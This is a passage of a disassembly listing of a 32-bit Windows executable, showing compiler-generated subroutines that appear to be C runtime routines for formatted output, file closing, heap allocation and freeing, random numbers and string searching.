		call	sub_403200
		push	offset dword_422F10
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41E334
		call	sub_40477B
		int	3		; Trap to Debugger
sub_4035D9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403643	proc near		; CODE XREF: sub_419D3D+84p
					; sub_419D3D+102p ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_4], ebx
		jnz	short loc_40366E

loc_403651:				; CODE XREF: sub_403643+30j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4036BB
; ---------------------------------------------------------------------------

loc_40366E:				; CODE XREF: sub_403643+Cj
		mov	eax, [ebp+arg_0]
		cmp	eax, ebx
		jz	short loc_403651
		push	esi
		mov	[ebp+var_18], eax
		mov	[ebp+var_20], eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	ebx
		push	[ebp+arg_4]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_1C], 7FFFFFFFh
		mov	[ebp+var_14], 42h
		call	sub_406F97
		add	esp, 10h
		dec	[ebp+var_1C]
		mov	esi, eax
		js	short loc_4036AC
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4036B8
; ---------------------------------------------------------------------------

loc_4036AC:				; CODE XREF: sub_403643+60j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_4036B8:				; CODE XREF: sub_403643+67j
		mov	eax, esi
		pop	esi

loc_4036BB:				; CODE XREF: sub_403643+29j
		pop	ebx
		leave
		retn
sub_403643	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4036BE	proc near		; CODE XREF: sub_403782+Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	0Ch
		push	offset dword_422898
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		cmp	edi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_4036F9

loc_4036DD:				; CODE XREF: sub_4036BE+47j
					; sub_4036BE+52j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h

loc_4036F5:				; CODE XREF: sub_4036BE+6Bj
					; sub_4036BE+92j
		xor	eax, eax
		jmp	short loc_403772
; ---------------------------------------------------------------------------

loc_4036F9:				; CODE XREF: sub_4036BE+1Dj
		xor	eax, eax
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_4036DD
		xor	eax, eax
		cmp	[esi], bl
		setnz	al
		cmp	eax, ebx
		jz	short loc_4036DD
		call	sub_408A61
		mov	[ebp+arg_0], eax
		cmp	eax, ebx
		jnz	short loc_40372B
		call	sub_405D93
		mov	dword ptr [eax], 18h
		jmp	short loc_4036F5
; ---------------------------------------------------------------------------

loc_40372B:				; CODE XREF: sub_4036BE+5Ej
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[edi], bl
		jnz	short loc_403752
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	0FFFFFFFEh
		lea	eax, [ebp+ms_exc.prev_er]
		push	eax
		push	offset dword_424064
		call	sub_408B88
		add	esp, 0Ch
		jmp	short loc_4036F5
; ---------------------------------------------------------------------------

loc_403752:				; CODE XREF: sub_4036BE+72j
		push	eax
		push	[ebp+arg_8]
		push	esi
		push	edi
		call	sub_4087BF
		add	esp, 10h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403778
		mov	eax, [ebp+var_1C]

loc_403772:				; CODE XREF: sub_4036BE+39j
		call	__SEH_epilog4
		retn
sub_4036BE	endp


; =============== S U B	R O U T	I N E =======================================



sub_403778	proc near		; CODE XREF: sub_4036BE+ACp
					; DATA XREF: zcrshv4o:004228B0o
		push	dword ptr [ebp+8]
		call	sub_40876D
		pop	ecx
		retn
sub_403778	endp


; =============== S U B	R O U T	I N E =======================================



sub_403782	proc near		; CODE XREF: sub_419D3D+116p
					; sub_41BD4E+4Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	40h
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
		call	sub_4036BE
		add	esp, 0Ch
		retn
sub_403782	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403795	proc near		; CODE XREF: sub_419D3D+131p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	0Ch
		push	offset dword_4228B8
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_4037D4

loc_4037B4:				; CODE XREF: sub_403795+49j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_4038D4
; ---------------------------------------------------------------------------

loc_4037D4:				; CODE XREF: sub_403795+1Dj
		xor	eax, eax
		cmp	[ebp+arg_4], ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_4037B4
		mov	[ebp+arg_0], esi
		push	esi
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_40389D
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_403831
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_403831
		push	esi
		call	sub_408FE0
		sar	eax, 5
		lea	edi, ds:437EC0h[eax*4]
		push	esi
		call	sub_408FE0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_403836
; ---------------------------------------------------------------------------

loc_403831:				; CODE XREF: sub_403795+6Cj
					; sub_403795+78j
		mov	eax, offset dword_424BD0

loc_403836:				; CODE XREF: sub_403795+9Aj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_403881
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_403876
		push	esi
		call	sub_408FE0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_403876
		push	esi
		call	sub_408FE0
		sar	eax, 5
		lea	edi, ds:437EC0h[eax*4]
		push	esi
		call	sub_408FE0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_40387B
; ---------------------------------------------------------------------------

loc_403876:				; CODE XREF: sub_403795+B1j
					; sub_403795+BDj
		mov	eax, offset dword_424BD0

loc_40387B:				; CODE XREF: sub_403795+DFj
		test	byte ptr [eax+24h], 80h
		jz	short loc_40389D

loc_403881:				; CODE XREF: sub_403795+A5j
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40389D:				; CODE XREF: sub_403795+5Cj
					; sub_403795+EAj
		cmp	[ebp+var_1C], ebx
		jnz	short loc_4038C5
		push	esi
		call	sub_408CDB
		mov	edi, eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	ebx
		push	[ebp+arg_4]
		push	esi
		call	sub_406F97
		mov	[ebp+var_1C], eax
		push	esi
		push	edi
		call	sub_408D71
		add	esp, 1Ch

loc_4038C5:				; CODE XREF: sub_403795+10Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4038DA
		mov	eax, [ebp+var_1C]

loc_4038D4:				; CODE XREF: sub_403795+3Aj
		call	__SEH_epilog4
		retn
sub_403795	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038DA	proc near		; CODE XREF: sub_403795+137p
					; DATA XREF: zcrshv4o:004228D0o
		push	dword ptr [ebp+8]
		call	sub_40876D
		pop	ecx
		retn
sub_4038DA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038E4	proc near		; CODE XREF: sub_41810B+4Fp
					; sub_41B3E7+20Fp

arg_0		= dword	ptr  4

		call	sub_40595D
		mov	ecx, [esp+arg_0]
		mov	[eax+14h], ecx
		retn
sub_4038E4	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038F1	proc near		; CODE XREF: sub_41810B:loc_418287p
					; sub_419D3D+A7p ...
		call	sub_40595D
		mov	ecx, [eax+14h]
		imul	ecx, 343FDh
		add	ecx, 269EC3h
		mov	[eax+14h], ecx
		mov	eax, ecx
		shr	eax, 10h
		and	eax, 7FFFh
		retn
sub_4038F1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403913	proc near		; CODE XREF: sub_4039C4+12p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_403941
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_4039C1
; ---------------------------------------------------------------------------

loc_403941:				; CODE XREF: sub_403913+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_40396D
		cmp	esi, ebx
		jnz	short loc_40396D
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4039C0
; ---------------------------------------------------------------------------

loc_40396D:				; CODE XREF: sub_403913+37j
					; sub_403913+3Bj
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_40397C
		mov	[ebp+var_1C], ecx

loc_40397C:				; CODE XREF: sub_403913+64j
		push	edi
		push	[ebp+arg_10]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_C]
		mov	[ebp+var_14], 42h
		push	[ebp+arg_8]
		mov	[ebp+var_18], esi
		push	eax
		mov	[ebp+var_20], esi
		call	sub_406F97
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_4039BF
		dec	[ebp+var_1C]
		js	short loc_4039B1
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4039BD
; ---------------------------------------------------------------------------

loc_4039B1:				; CODE XREF: sub_403913+95j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_4039BD:				; CODE XREF: sub_403913+9Cj
		mov	eax, edi

loc_4039BF:				; CODE XREF: sub_403913+90j
		pop	edi

loc_4039C0:				; CODE XREF: sub_403913+58j
		pop	esi

loc_4039C1:				; CODE XREF: sub_403913+29j
		pop	ebx
		leave
		retn
sub_403913	endp


; =============== S U B	R O U T	I N E =======================================



sub_4039C4	proc near		; CODE XREF: sub_417F4C+3Ep
					; sub_417FE1+7Cp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	0
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_403913
		add	esp, 14h
		retn
sub_4039C4	endp


; =============== S U B	R O U T	I N E =======================================



sub_4039DF	proc near		; CODE XREF: sub_403A52+5Ap

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		push	edi
		xor	edi, edi
		or	ebx, 0FFFFFFFFh
		cmp	esi, edi
		jnz	short loc_403A0C
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403A4E
; ---------------------------------------------------------------------------

loc_403A0C:				; CODE XREF: sub_4039DF+Ej
		test	byte ptr [esi+0Ch], 83h
		jz	short loc_403A49
		push	esi
		call	sub_40919A
		push	esi
		mov	ebx, eax
		call	sub_40916E
		push	esi
		call	sub_408FE0
		push	eax
		call	sub_4090A1
		add	esp, 10h
		test	eax, eax
		jge	short loc_403A38
		or	ebx, 0FFFFFFFFh
		jmp	short loc_403A49
; ---------------------------------------------------------------------------

loc_403A38:				; CODE XREF: sub_4039DF+52j
		mov	eax, [esi+1Ch]
		cmp	eax, edi
		jz	short loc_403A49
		push	eax
		call	sub_403B91
		pop	ecx
		mov	[esi+1Ch], edi

loc_403A49:				; CODE XREF: sub_4039DF+31j
					; sub_4039DF+57j ...
		mov	[esi+0Ch], edi
		mov	eax, ebx

loc_403A4E:				; CODE XREF: sub_4039DF+2Bj
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_4039DF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403A52	proc near		; CODE XREF: sub_40E593+43p
					; sub_419D3D+137p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_4228D8
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		xor	edi, edi
		cmp	esi, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_403A8F
		call	sub_405D93
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403A9B
; ---------------------------------------------------------------------------

loc_403A8F:				; CODE XREF: sub_403A52+1Ej
		test	byte ptr [esi+0Ch], 40h
		jz	short loc_403AA1
		mov	[esi+0Ch], edi

loc_403A98:				; CODE XREF: sub_403A52+6Fj
		mov	eax, [ebp+var_1C]

loc_403A9B:				; CODE XREF: sub_403A52+3Bj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_403AA1:				; CODE XREF: sub_403A52+41j
		push	esi
		call	sub_40871B
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	esi
		call	sub_4039DF
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403AC6
		jmp	short loc_403A98
sub_403A52	endp

; ---------------------------------------------------------------------------
		mov	esi, [ebp+8]

; =============== S U B	R O U T	I N E =======================================



sub_403AC6	proc near		; CODE XREF: sub_403A52+6Ap
		push	esi
		call	sub_40876D
		pop	ecx
		retn
sub_403AC6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403ACE	proc near		; CODE XREF: .text:00419F40p
					; sub_419F7B+13p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E1A0
		mov	eax, [ebp+var_8]
		mov	ecx, [ebp+var_4]
		push	0
		add	eax, 2AC18000h
		push	989680h
		adc	ecx, 0FE624E21h
		push	ecx
		push	eax
		call	sub_409330
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short locret_403B08
		mov	[ecx], eax
		mov	[ecx+4], edx

locret_403B08:				; CODE XREF: sub_403ACE+33j
		leave
		retn
sub_403ACE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403B0A	proc near		; CODE XREF: sub_403B72+15p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	edi
		push	esi
		call	sub_4046F0
		xor	edi, edi
		cmp	esi, edi
		pop	ecx
		jnz	short loc_403B3B

loc_403B1E:				; CODE XREF: sub_403B0A+34j
		call	sub_405D93
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4034C7
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403B6F
; ---------------------------------------------------------------------------

loc_403B3B:				; CODE XREF: sub_403B0A+12j
		cmp	[ebp+arg_4], edi
		jz	short loc_403B1E
		mov	ecx, 7FFFFFFFh
		cmp	eax, ecx
		mov	[ebp+var_14], 49h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		mov	[ebp+var_1C], ecx
		ja	short loc_403B5C
		mov	[ebp+var_1C], eax

loc_403B5C:				; CODE XREF: sub_403B0A+4Dj
		push	[ebp+arg_C]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	eax
		call	[ebp+arg_0]
		add	esp, 10h

loc_403B6F:				; CODE XREF: sub_403B0A+2Fj
		pop	edi
		leave
		retn
sub_403B0A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_403B72	proc near		; CODE XREF: sub_4024A4+22Ep
					; sub_4024A4+36Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= byte ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		lea	eax, [esp+4+arg_8]
		push	eax
		push	0
		push	[esp+0Ch+arg_4]
		push	offset sub_409427
		call	sub_403B0A
		add	esp, 10h
		pop	esi
		retn
sub_403B72	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403B91	proc near		; CODE XREF: sub_403258+Fp sub_4034FBj ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00403BF0 SIZE 0000002F BYTES

		push	0Ch
		push	offset dword_4228F8
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	short loc_403C19
		cmp	dword_439014, 3
		jnz	short loc_403BF0
		push	4
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_4060E5
		pop	ecx
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_403BD0
		push	esi
		push	eax
		call	sub_406110
		pop	ecx
		pop	ecx

loc_403BD0:				; CODE XREF: sub_403B91+34j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403BE7
		cmp	[ebp+var_1C], 0
		jnz	short loc_403C19
		push	[ebp+arg_0]
		jmp	short loc_403BF1
sub_403B91	endp


; =============== S U B	R O U T	I N E =======================================



sub_403BE7	proc near		; CODE XREF: sub_403B91+46p
					; DATA XREF: zcrshv4o:00422910o
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_403BE7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_403B91

loc_403BF0:				; CODE XREF: sub_403B91+1Aj
		push	esi

loc_403BF1:				; CODE XREF: sub_403B91+54j
		push	0
		push	dword_428A88
		call	ds:dword_41E108	; RtlFreeHeap
		test	eax, eax
		jnz	short loc_403C19
		call	sub_405D93
		mov	esi, eax
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405D58
		mov	[esi], eax
		pop	ecx

loc_403C19:				; CODE XREF: sub_403B91+11j
					; sub_403B91+4Fj ...
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_403B91

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403C1F	proc near		; CODE XREF: sub_403C6E+59p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422918
		call	__SEH_prolog4
		and	[ebp+var_1C], 0
		mov	esi, [ebp+arg_0]
		cmp	esi, dword_439004
		ja	short loc_403C5C
		push	4
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_4068B9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403C65

loc_403C5C:				; CODE XREF: sub_403C1F+19j
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_403C1F	endp


; =============== S U B	R O U T	I N E =======================================



sub_403C65	proc near		; CODE XREF: sub_403C1F+38p
					; DATA XREF: zcrshv4o:00422930o
		push	4
		call	sub_405EDF
		pop	ecx
		retn
sub_403C65	endp


; =============== S U B	R O U T	I N E =======================================



sub_403C6E	proc near		; CODE XREF: sub_40319A+1Fp
					; sub_403200+2Ap ...

arg_0		= dword	ptr  4

		push	ebp
		mov	ebp, [esp+4+arg_0]
		cmp	ebp, 0FFFFFFE0h
		ja	loc_403D1B
		push	ebx
		mov	ebx, ds:dword_41E110
		push	esi
		push	edi

loc_403C85:				; CODE XREF: sub_403C6E+94j
		xor	esi, esi
		cmp	dword_428A88, esi
		mov	edi, ebp
		jnz	short loc_403CA9
		call	sub_40A214
		push	1Eh
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx

loc_403CA9:				; CODE XREF: sub_403C6E+21j
		mov	eax, dword_439014
		cmp	eax, 1
		jnz	short loc_403CC1
		cmp	ebp, esi
		jz	short loc_403CBB
		mov	eax, ebp
		jmp	short loc_403CBE
; ---------------------------------------------------------------------------

loc_403CBB:				; CODE XREF: sub_403C6E+47j
		xor	eax, eax
		inc	eax

loc_403CBE:				; CODE XREF: sub_403C6E+4Bj
		push	eax
		jmp	short loc_403CDF
; ---------------------------------------------------------------------------

loc_403CC1:				; CODE XREF: sub_403C6E+43j
		cmp	eax, 3
		jnz	short loc_403CD1
		push	ebp
		call	sub_403C1F
		cmp	eax, esi
		pop	ecx
		jnz	short loc_403CE8

loc_403CD1:				; CODE XREF: sub_403C6E+56j
		cmp	ebp, esi
		jnz	short loc_403CD8
		xor	edi, edi
		inc	edi

loc_403CD8:				; CODE XREF: sub_403C6E+65j
		add	edi, 0Fh
		and	edi, 0FFFFFFF0h
		push	edi

loc_403CDF:				; CODE XREF: sub_403C6E+51j
		push	esi
		push	dword_428A88
		call	ebx	; RtlAllocateHeap

loc_403CE8:				; CODE XREF: sub_403C6E+61j
		mov	esi, eax
		test	esi, esi
		jnz	short loc_403D14
		cmp	dword_428E0C, eax
		push	0Ch
		pop	edi
		jz	short loc_403D06
		push	ebp
		call	sub_408622
		test	eax, eax
		pop	ecx
		jnz	short loc_403C85
		jmp	short loc_403D0D
; ---------------------------------------------------------------------------

loc_403D06:				; CODE XREF: sub_403C6E+89j
		call	sub_405D93
		mov	[eax], edi

loc_403D0D:				; CODE XREF: sub_403C6E+96j
		call	sub_405D93
		mov	[eax], edi

loc_403D14:				; CODE XREF: sub_403C6E+7Ej
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_403D1B:				; CODE XREF: sub_403C6E+8j
		push	ebp
		call	sub_408622
		pop	ecx
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		pop	ebp
		retn
sub_403C6E	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403D40	proc near		; CODE XREF: sub_4184BD+84p
					; sub_41913F+1Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		push	edi
		push	ebx
		push	esi
		mov	dl, [ecx]
		mov	edi, [esp+0Ch+arg_0]
		test	dl, dl
		jz	short loc_403DC0
		mov	dh, [ecx+1]
		test	dh, dh
		jz	short loc_403DAD

loc_403D58:				; CODE XREF: sub_403D40+58j
					; sub_403D40+6Bj
		mov	esi, edi
		mov	ecx, [esp+0Ch+arg_4]
		mov	al, [edi]
		add	esi, 1
		cmp	al, dl
		jz	short loc_403D7E
		test	al, al
		jz	short loc_403D78

loc_403D6B:				; CODE XREF: sub_403D40+36j
		mov	al, [esi]
		add	esi, 1

loc_403D70:				; CODE XREF: sub_403D40+45j
		cmp	al, dl
		jz	short loc_403D7E
		test	al, al
		jnz	short loc_403D6B

loc_403D78:				; CODE XREF: sub_403D40+29j
		pop	esi
		pop	ebx
		pop	edi
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403D7E:				; CODE XREF: sub_403D40+25j
					; sub_403D40+32j
		mov	al, [esi]
		add	esi, 1
		cmp	al, dh
		jnz	short loc_403D70
		lea	edi, [esi-1]

loc_403D8A:				; CODE XREF: sub_403D40+69j
		mov	ah, [ecx+2]
		test	ah, ah
		jz	short loc_403DB9
		mov	al, [esi]
		add	esi, 2
		cmp	al, ah
		jnz	short loc_403D58
		mov	al, [ecx+3]
		test	al, al
		jz	short loc_403DB9
		mov	ah, [esi-1]
		add	ecx, 2
		cmp	al, ah
		jz	short loc_403D8A
		jmp	short loc_403D58
; ---------------------------------------------------------------------------

loc_403DAD:				; CODE XREF: sub_403D40+16j
		xor	eax, eax
		pop	esi
		pop	ebx
		pop	edi
		mov	al, dl
		jmp	loc_403DE6
; ---------------------------------------------------------------------------

loc_403DB9:				; CODE XREF: sub_403D40+4Fj
					; sub_403D40+5Fj
		lea	eax, [edi-1]
		pop	esi
		pop	ebx
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403DC0:				; CODE XREF: sub_403D40+Fj
		mov	eax, edi
		pop	esi
		pop	ebx
		pop	edi
		retn
sub_403D40	endp

; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_403DE0

loc_403DD0:				; CODE XREF: sub_403DE0+1Fj
		lea	eax, [edx-1]
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_403DE0
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403DE0	proc near		; CODE XREF: sub_418FFF+Bp
					; sub_419016+35p ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

; FUNCTION CHUNK AT 00403DD0 SIZE 00000005 BYTES

		xor	eax, eax
		mov	al, [esp+arg_4]

loc_403DE6:				; CODE XREF: sub_403D40+74j
		push	ebx
		mov	ebx, eax
		shl	eax, 8
		mov	edx, [esp+4+arg_0]
		test	edx, 3
		jz	short loc_403E0D

loc_403DF8:				; CODE XREF: sub_403DE0+2Bj
		mov	cl, [edx]
		add	edx, 1
		cmp	cl, bl
		jz	short loc_403DD0
		test	cl, cl
		jz	short loc_403E56
		test	edx, 3
		jnz	short loc_403DF8

loc_403E0D:				; CODE XREF: sub_403DE0+16j
		or	ebx, eax
		push	edi
		mov	eax, ebx
		shl	ebx, 10h
		push	esi
		or	ebx, eax

loc_403E18:				; CODE XREF: sub_403DE0+63j
					; sub_403DE0+72j ...
		mov	ecx, [edx]
		mov	edi, 7EFEFEFFh
		mov	eax, ecx
		mov	esi, edi
		xor	ecx, ebx
		add	esi, eax
		add	edi, ecx
		xor	ecx, 0FFFFFFFFh
		xor	eax, 0FFFFFFFFh
		xor	ecx, edi
		xor	eax, esi
		add	edx, 4
		and	ecx, 81010100h
		jnz	short loc_403E5A
		and	eax, 81010100h
		jz	short loc_403E18
		and	eax, 1010100h
		jnz	short loc_403E54
		and	esi, 80000000h
		jnz	short loc_403E18

loc_403E54:				; CODE XREF: sub_403DE0+6Aj
					; sub_403DE0+83j ...
		pop	esi
		pop	edi

loc_403E56:				; CODE XREF: sub_403DE0+23j
		pop	ebx
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403E5A:				; CODE XREF: sub_403DE0+5Cj
		mov	eax, [edx-4]
		cmp	al, bl
		jz	short loc_403E97
		test	al, al
		jz	short loc_403E54
		cmp	ah, bl
		jz	short loc_403E90
		test	ah, ah
		jz	short loc_403E54
		shr	eax, 10h
		cmp	al, bl
		jz	short loc_403E89
		test	al, al
		jz	short loc_403E54
		cmp	ah, bl
		jz	short loc_403E82
		test	ah, ah
		jz	short loc_403E54
		jmp	short loc_403E18
; ---------------------------------------------------------------------------

loc_403E82:				; CODE XREF: sub_403DE0+9Aj
		pop	esi
		pop	edi
		lea	eax, [edx-1]
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403E89:				; CODE XREF: sub_403DE0+92j
		lea	eax, [edx-2]
		pop	esi
		pop	edi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403E90:				; CODE XREF: sub_403DE0+87j
		lea	eax, [edx-3]
		pop	esi
		pop	edi
		pop	ebx
		retn
